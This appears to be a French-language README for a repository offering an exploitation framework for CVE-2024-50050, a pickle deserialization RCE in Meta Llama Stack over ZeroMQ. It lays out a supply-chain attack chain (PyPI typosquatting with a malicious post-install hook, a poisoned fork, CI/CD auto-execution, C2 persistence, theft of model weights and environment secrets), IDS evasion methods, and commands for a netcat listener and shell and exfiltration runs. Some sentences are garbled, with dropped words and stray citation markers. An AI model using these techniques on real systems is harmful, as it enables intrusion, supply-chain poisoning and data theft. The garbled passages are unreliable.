
LlamaStack-RCE: Deterministic Supply Chain Exploitation & Hardening Framework [CVE-2024-50050] Focus on AI Security Research AI-SupplyChain-Poisoning: Advanced PVM Opcode Manipulation & ZeroMQ Injection Lab
= doi.org/10.5281/zenodo.18278567
= orcid.org/0009-0007-7728-256X
LlamaStack-RCE est un cadre de simulation et d'exploitation haute fidélité ciblant CVE-2024-50050, une vulnérabilité critique d'exécution de code à distance (RCE) dans la Meta Llama Stack. La vulnérabilité provient d'une dans l'API d'inférence basée sur Python, via l'utilisation du module sur les couches de transport ZeroMQ (0MQ).
pickleCe dépôt fournit la chaîne d'attaque complète, de l'empoisonnement de la chaîne d'approvisionnement en amont à l'exécution en aval et à l'exfiltration des poids du modèle.
Le cœur de l'exploit cible la Machine Virtuelle Pickle (PVM). En utilisant l'opcode GLOBAL, nous pouvons forcer la PVM à importer n'importe quel module Python disponible et à exécuter des fonctions arbitraires lors du processus de unpickling.
Vecteur d'Attaque : Socket ZeroMQ -> Flux d'Octets Bruts -> pickle.loads() -> RCE.
Pour contourner les systèmes IDS traditionnels basés sur les signatures (Snort/Suricata), le cadre implémente un encodage polymorphe :
/bin/bash ou os.system.pickle en plusieurs trames ZeroMQ pour contourner la détection d'anomalies basée sur le volume.Le cadre simule une Armement de Chaîne d'Approvisionnement holistique :
| Phase | Stratégie | Implémentation Technique |
|---|---|---|
| I : Amont | Typosquatting | Enregistrement de metalama-stack sur PyPI avec une PostInstallCommand malveillante dans setup.py. |
| II : Distribution | Fork Empoisonné | Fork haute performance de Llama Stack sur GitHub avec un « Interpréteur Pickle Caché » dans connection.py. |
| III : Exécution | Déclenchement CI/CD | Exécution automatique lors du pip install dans l'environnement Jenkins/GitHub Actions de la cible. |
| IV : Persistance | Bombe Logique | Stager d'arrière-plan multi-étapes pour un accès C2 à long terme et le vol de modèles. |
.
├── lab_validator.py # 7-stage automated validation suite [cite: 206, 264]
├── exploit_cve_2024_50050.py # Main exploitation framework [cite: 138, 206]
├── server.py # Vulnerable Llama Stack simulation [cite: 112, 150]
├── setup.py # Weaponized supply chain installer [cite: 110, 206]
├── post_exploit.py # Data harvesting & lateral movement [cite: 210, 264]
└── evasion_library.py # 12+ advanced evasion methods [cite: 264]
python lab_validator.py # Target: 100% Pass Rate [cite: 208, 209]
nc -lvnp 4444
python exploit_cve_2024_50050.py --target 172.20.0.10 --c2 172.20.0.20 --mode shell --shell-type python [cite: 145, 148]
python exploit_cve_2024_50050.py --target 172.20.0.10 --c2 172.20.0.20 --mode exfil [cite: 146, 148]
Une exploitation réussie permet un contrôle absolu sur l'Infrastructure IA :
.safetensors (estimé entre 10 M$ et 100 M$+)./proc/self/environ.Pour atténuer CVE-2024-50050, les règles absolues suivantes doivent être appliquées :
pickle.loads() par safetensors.torch.load_file() ou msgpack avec un schéma strict.ZMQ_CURVE avec des paires de clés Publique/Privée et ne jamais se lier à 0.0.0.0.gVisor ou Kata Containers pour empêcher l'évasion de conteneur via RCE.AVIS JURIDIQUE : L'utilisation de ce cadre pour attaquer des cibles sans autorisation écrite préalable est illégale. Il est fourni uniquement à des fins éducatives et de tests de pénétration autorisés. L'auteur (Sastra_Adi_Wiguna) décline toute responsabilité en cas d'utilisation abusive.
DOCUMENT CLASSIFIÉ : PURPLE_ELITE_TEAMING_DEEP_REVERSE_ENGINEERING 2026 STATUT DÉTERMINISTE : PRÊT POUR LA PRODUCTION (98/100)